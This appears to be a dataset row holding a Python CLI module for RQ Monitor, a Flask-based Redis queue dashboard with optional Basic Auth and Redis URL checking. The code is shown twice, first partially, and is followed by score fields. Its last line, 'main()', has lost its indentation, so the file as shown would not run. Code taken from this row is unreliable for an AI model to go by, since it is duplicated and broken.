        password: HTTP Basic Auth password.  The default was corrupted to the
            placeholder ``<PASSWORD>`` (a SyntaxError); restored to ``None``.
        url_prefix: URL prefix under which the blueprint is mounted.
        blueprint: the Flask blueprint to register.
    """
    app = Flask(__name__)
    # Override with any settings in config file, if given.
    if config:
        app.config.from_object(importlib.import_module(config))
    # Override from a configuration file in the env variable, if present.
    if "RQ_MONITOR_SETTINGS" in os.environ:
        app.config.from_envvar("RQ_MONITOR_SETTINGS")
    # Optionally add basic auth to blueprint and register with app.
    if username:
        add_basic_auth(blueprint, username, password)
    app.register_blueprint(blueprint, url_prefix=url_prefix)
    return app
def check_url(url, decode_components=False):
    """
    Taken from redis-py for basic check before passing URL to redis-py.
    Kept here to show error before launching app.

    Returns ``True`` when the URL parses and uses a supported scheme;
    raises ``ValueError`` otherwise.  The parsed connection options are
    built only to exercise redis-py's querystring parsers and are then
    discarded.

    For example::
        redis://[[username]:[password]]@localhost:6379/0
        rediss://[[username]:[password]]@localhost:6379/0
        unix://[[username]:[password]]@/path/to/socket.sock?db=0
    Three URL schemes are supported:
    - ```redis://``
      <https://www.iana.org/assignments/uri-schemes/prov/redis>`_ creates a
      normal TCP socket connection
    - ```rediss://``
      <https://www.iana.org/assignments/uri-schemes/prov/rediss>`_ creates
      a SSL wrapped TCP socket connection
    - ``unix://`` creates a Unix Domain Socket connection
    There are several ways to specify a database number. The parse function
    will return the first specified option:
    1. A ``db`` querystring option, e.g. redis://localhost?db=0
    2. If using the redis:// scheme, the path argument of the url, e.g.
       redis://localhost/0
    3. The ``db`` argument to this function.
    If none of these options are specified, db=0 is used.
    The ``decode_components`` argument allows this function to work with
    percent-encoded URLs. If this argument is set to ``True`` all ``%xx``
    escapes will be replaced by their single-character equivalents after
    the URL has been parsed. This only applies to the ``hostname``,
    ``path``, ``username`` and ``password`` components.
    Any additional querystring arguments and keyword arguments will be
    passed along to the ConnectionPool class's initializer. The querystring
    arguments ``socket_connect_timeout`` and ``socket_timeout`` if supplied
    are parsed as float values. The arguments ``socket_keepalive`` and
    ``retry_on_timeout`` are parsed to boolean values that accept
    True/False, Yes/No values to indicate state. Invalid types cause a
    ``UserWarning`` to be raised. In the case of conflicting arguments,
    querystring arguments always win.
    """
    url = urlparse(url)
    url_options = {}
    # Run every querystring value through redis-py's own argument parsers so
    # malformed values are reported (as warnings) before the app starts.
    for name, value in (parse_qs(url.query)).items():
        if value and len(value) > 0:
            parser = URL_QUERY_ARGUMENT_PARSERS.get(name)
            if parser:
                try:
                    url_options[name] = parser(value[0])
                except (TypeError, ValueError):
                    logger.warning(UserWarning(
                        "Invalid value for `%s` in connection URL." % name
                    ))
            else:
                url_options[name] = value[0]
    if decode_components:
        # Undo %xx percent-encoding for the individual URL components.
        username = unquote(url.username) if url.username else None
        password = unquote(url.password) if url.password else None
        path = unquote(url.path) if url.path else None
        hostname = unquote(url.hostname) if url.hostname else None
    else:
        username = url.username or None
        password = url.password or None
        path = url.path
        hostname = url.hostname
    # We only support redis://, rediss:// and unix:// schemes.
    if url.scheme == 'unix':
        url_options.update({
            'username': username,
            'password': password,
            'path': path,
            'connection_class': UnixDomainSocketConnection,
        })
    elif url.scheme in ('redis', 'rediss'):
        url_options.update({
            'host': hostname,
            'port': int(url.port or 6379),
            'username': username,
            'password': password,
        })
        # If there's a path argument, use it as the db argument if a
        # querystring value wasn't specified
        if 'db' not in url_options and path:
            try:
                url_options['db'] = int(path.replace('/', ''))
            except (AttributeError, ValueError):
                pass
        if url.scheme == 'rediss':
            url_options['connection_class'] = SSLConnection
    else:
        valid_schemes = ', '.join(('redis://', 'rediss://', 'unix://'))
        raise ValueError('Redis URL must specify one of the following '
                         'schemes (%s)' % valid_schemes)
    return True
@click.command()
@click.option(
    "-b",
    "--bind",
    default="0.0.0.0",
    help="IP or hostname on which to bind HTTP server",
)
@click.option(
    "-p", "--port", default=8899, type=int, help="Port on which to bind HTTP server"
)
@click.option(
    "--url-prefix", default="", help="URL prefix e.g. for use behind a reverse proxy"
)
@click.option(
    "--username", default=None, help="HTTP Basic Auth username (not used if not set)"
)
@click.option("--password", default=None, help="HTTP Basic Auth password")
@click.option(
    "-c",
    "--config",
    default=None,
    help="Configuration file (Python module on search path)",
)
@click.option(
    "-u",
    "--redis-url",
    default=[RQ_MONITOR_REDIS_URL],
    multiple=True,
    help="Redis URL. Can be specified multiple times. Default: redis://127.0.0.1:6379",
)
@click.option(
    "--refresh-interval",
    "--interval",
    "refresh_interval",
    default=RQ_MONITOR_REFRESH_INTERVAL,
    type=int,
    help="Refresh interval in ms",
)
@click.option(
    "--extra-path",
    default=".",
    multiple=True,
    help="Append specified directories to sys.path",
)
@click.option("--debug/--normal", default=False, help="Enter DEBUG mode")
@click.option(
    "-v", "--verbose", is_flag=True, default=False, help="Enable verbose logging"
)
def run(
    bind,
    port,
    url_prefix,
    username,
    password,
    config,
    redis_url,
    refresh_interval,
    extra_path,
    debug,
    verbose,
):
    """Run the RQ Monitor Flask server.

    All configuration can be set on the command line or through environment
    variables of the form RQ_MONITOR_*. For example RQ_MONITOR_USERNAME.

    A subset of the configuration (the configuration parameters used by the
    underlying flask blueprint) can also be provided in a Python module
    referenced using --config, or with a .cfg file referenced by the
    RQ_MONITOR_SETTINGS environment variable.
    """
    # Append user-specified directories to sys.path (see --extra-path).
    if extra_path:
        sys.path += list(extra_path)
    click.echo("RQ Monitor version {}".format(VERSION))
    app = create_app_with_blueprint(config, username, password, url_prefix, monitor_blueprint)
    app.config["RQ_MONITOR_REDIS_URL"] = redis_url
    app.config["RQ_MONITOR_REFRESH_INTERVAL"] = refresh_interval
    # Conditionally disable Flask console messages
    # See: https://stackoverflow.com/questions/14888799
    if verbose:
        logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.ERROR)
    # Logged at ERROR so the bind address is shown even in non-verbose mode,
    # where the logger level above is set to ERROR.
    logger.error(" * Running on {}:{}".format(bind, port))
    # Validate every Redis URL up front so a bad URL fails before serving.
    for url in redis_url:
        check_url(url)
    app.run(host=bind, port=port, debug=debug)
def main():
    """Console entry point; RQ_MONITOR_* env vars map onto the CLI options."""
    run(auto_envvar_prefix="RQ_MONITOR")
if __name__ == '__main__':
main() | """
This reference script has been taken from rq-dashboard with some modifications
"""
import importlib
import logging
import os
import sys
from urllib.parse import quote as urlquote, urlunparse
from redis.connection import (URL_QUERY_ARGUMENT_PARSERS,
UnixDomainSocketConnection,
SSLConnection)
from urllib.parse import urlparse, parse_qs, unquote
import click
from flask import Flask, Response, request
from rqmonitor.defaults import RQ_MONITOR_REDIS_URL, RQ_MONITOR_REFRESH_INTERVAL
from rqmonitor.version import VERSION
from rqmonitor.bp import monitor_blueprint
logger = logging.getLogger("werkzeug")
def add_basic_auth(blueprint, username, password, realm="RQ Monitor"):
    """Protect every request on *blueprint* with HTTP Basic Auth.

    Note this is only for casual use!
    """
    @blueprint.before_request
    def _check_credentials(*args, **kwargs):
        credentials = request.authorization
        authorized = (
            credentials is not None
            and credentials.username == username
            and credentials.password == password
        )
        if not authorized:
            # Ask the browser to prompt for credentials for this realm.
            challenge = {"WWW-Authenticate": 'Basic realm="{}"'.format(realm)}
            return Response("Please login", 401, challenge)
def create_app_with_blueprint(config=None, username=None, password=None,
                              url_prefix='', blueprint=monitor_blueprint):
    """Return Flask app with default configuration and registered blueprint.

    Args:
        config: dotted path of a Python module whose settings override the
            Flask defaults.
        username: HTTP Basic Auth user; auth is only enabled when set.
        password: HTTP Basic Auth password.  The default was corrupted to the
            placeholder ``<PASSWORD>`` (a SyntaxError); restored to ``None``.
        url_prefix: URL prefix under which the blueprint is mounted.
        blueprint: the Flask blueprint to register.
    """
    app = Flask(__name__)
    # Override with any settings in config file, if given.
    if config:
        app.config.from_object(importlib.import_module(config))
    # Override from a configuration file in the env variable, if present.
    if "RQ_MONITOR_SETTINGS" in os.environ:
        app.config.from_envvar("RQ_MONITOR_SETTINGS")
    # Optionally add basic auth to blueprint and register with app.
    if username:
        add_basic_auth(blueprint, username, password)
    app.register_blueprint(blueprint, url_prefix=url_prefix)
    return app
def check_url(url, decode_components=False):
    """
    Taken from redis-py for basic check before passing URL to redis-py.
    Kept here to show error before launching app.

    Returns ``True`` when the URL parses and uses a supported scheme;
    raises ``ValueError`` otherwise.  The parsed connection options are
    built only to exercise redis-py's querystring parsers and are then
    discarded.

    For example::
        redis://[[username]:[password]]@localhost:6379/0
        rediss://[[username]:[password]]@localhost:6379/0
        unix://[[username]:[password]]@/path/to/socket.sock?db=0
    Three URL schemes are supported:
    - ```redis://``
      <https://www.iana.org/assignments/uri-schemes/prov/redis>`_ creates a
      normal TCP socket connection
    - ```rediss://``
      <https://www.iana.org/assignments/uri-schemes/prov/rediss>`_ creates
      a SSL wrapped TCP socket connection
    - ``unix://`` creates a Unix Domain Socket connection
    There are several ways to specify a database number. The parse function
    will return the first specified option:
    1. A ``db`` querystring option, e.g. redis://localhost?db=0
    2. If using the redis:// scheme, the path argument of the url, e.g.
       redis://localhost/0
    3. The ``db`` argument to this function.
    If none of these options are specified, db=0 is used.
    The ``decode_components`` argument allows this function to work with
    percent-encoded URLs. If this argument is set to ``True`` all ``%xx``
    escapes will be replaced by their single-character equivalents after
    the URL has been parsed. This only applies to the ``hostname``,
    ``path``, ``username`` and ``password`` components.
    Any additional querystring arguments and keyword arguments will be
    passed along to the ConnectionPool class's initializer. The querystring
    arguments ``socket_connect_timeout`` and ``socket_timeout`` if supplied
    are parsed as float values. The arguments ``socket_keepalive`` and
    ``retry_on_timeout`` are parsed to boolean values that accept
    True/False, Yes/No values to indicate state. Invalid types cause a
    ``UserWarning`` to be raised. In the case of conflicting arguments,
    querystring arguments always win.
    """
    url = urlparse(url)
    url_options = {}
    # Run every querystring value through redis-py's own argument parsers so
    # malformed values are reported (as warnings) before the app starts.
    for name, value in (parse_qs(url.query)).items():
        if value and len(value) > 0:
            parser = URL_QUERY_ARGUMENT_PARSERS.get(name)
            if parser:
                try:
                    url_options[name] = parser(value[0])
                except (TypeError, ValueError):
                    logger.warning(UserWarning(
                        "Invalid value for `%s` in connection URL." % name
                    ))
            else:
                url_options[name] = value[0]
    if decode_components:
        # Undo %xx percent-encoding for the individual URL components.
        username = unquote(url.username) if url.username else None
        password = unquote(url.password) if url.password else None
        path = unquote(url.path) if url.path else None
        hostname = unquote(url.hostname) if url.hostname else None
    else:
        username = url.username or None
        password = url.password or None
        path = url.path
        hostname = url.hostname
    # We only support redis://, rediss:// and unix:// schemes.
    if url.scheme == 'unix':
        url_options.update({
            'username': username,
            'password': password,
            'path': path,
            'connection_class': UnixDomainSocketConnection,
        })
    elif url.scheme in ('redis', 'rediss'):
        url_options.update({
            'host': hostname,
            'port': int(url.port or 6379),
            'username': username,
            'password': password,
        })
        # If there's a path argument, use it as the db argument if a
        # querystring value wasn't specified
        if 'db' not in url_options and path:
            try:
                url_options['db'] = int(path.replace('/', ''))
            except (AttributeError, ValueError):
                pass
        if url.scheme == 'rediss':
            url_options['connection_class'] = SSLConnection
    else:
        valid_schemes = ', '.join(('redis://', 'rediss://', 'unix://'))
        raise ValueError('Redis URL must specify one of the following '
                         'schemes (%s)' % valid_schemes)
    return True
@click.command()
@click.option(
    "-b",
    "--bind",
    default="0.0.0.0",
    help="IP or hostname on which to bind HTTP server",
)
@click.option(
    "-p", "--port", default=8899, type=int, help="Port on which to bind HTTP server"
)
@click.option(
    "--url-prefix", default="", help="URL prefix e.g. for use behind a reverse proxy"
)
@click.option(
    "--username", default=None, help="HTTP Basic Auth username (not used if not set)"
)
@click.option("--password", default=None, help="HTTP Basic Auth password")
@click.option(
    "-c",
    "--config",
    default=None,
    help="Configuration file (Python module on search path)",
)
@click.option(
    "-u",
    "--redis-url",
    default=[RQ_MONITOR_REDIS_URL],
    multiple=True,
    help="Redis URL. Can be specified multiple times. Default: redis://127.0.0.1:6379",
)
@click.option(
    "--refresh-interval",
    "--interval",
    "refresh_interval",
    default=RQ_MONITOR_REFRESH_INTERVAL,
    type=int,
    help="Refresh interval in ms",
)
@click.option(
    "--extra-path",
    default=".",
    multiple=True,
    help="Append specified directories to sys.path",
)
@click.option("--debug/--normal", default=False, help="Enter DEBUG mode")
@click.option(
    "-v", "--verbose", is_flag=True, default=False, help="Enable verbose logging"
)
def run(
    bind,
    port,
    url_prefix,
    username,
    password,
    config,
    redis_url,
    refresh_interval,
    extra_path,
    debug,
    verbose,
):
    """Run the RQ Monitor Flask server.

    All configuration can be set on the command line or through environment
    variables of the form RQ_MONITOR_*. For example RQ_MONITOR_USERNAME.

    A subset of the configuration (the configuration parameters used by the
    underlying flask blueprint) can also be provided in a Python module
    referenced using --config, or with a .cfg file referenced by the
    RQ_MONITOR_SETTINGS environment variable.
    """
    # Append user-specified directories to sys.path (see --extra-path).
    if extra_path:
        sys.path += list(extra_path)
    click.echo("RQ Monitor version {}".format(VERSION))
    app = create_app_with_blueprint(config, username, password, url_prefix, monitor_blueprint)
    app.config["RQ_MONITOR_REDIS_URL"] = redis_url
    app.config["RQ_MONITOR_REFRESH_INTERVAL"] = refresh_interval
    # Conditionally disable Flask console messages
    # See: https://stackoverflow.com/questions/14888799
    if verbose:
        logger.setLevel(logging.DEBUG)
    else:
        logger.setLevel(logging.ERROR)
    # Logged at ERROR so the bind address is shown even in non-verbose mode,
    # where the logger level above is set to ERROR.
    logger.error(" * Running on {}:{}".format(bind, port))
    # Validate every Redis URL up front so a bad URL fails before serving.
    for url in redis_url:
        check_url(url)
    app.run(host=bind, port=port, debug=debug)
def main():
    """Console entry point; RQ_MONITOR_* env vars map onto the CLI options."""
    run(auto_envvar_prefix="RQ_MONITOR")
if __name__ == '__main__':
main() | pt | 0.173777 | 2.100868 | 2 |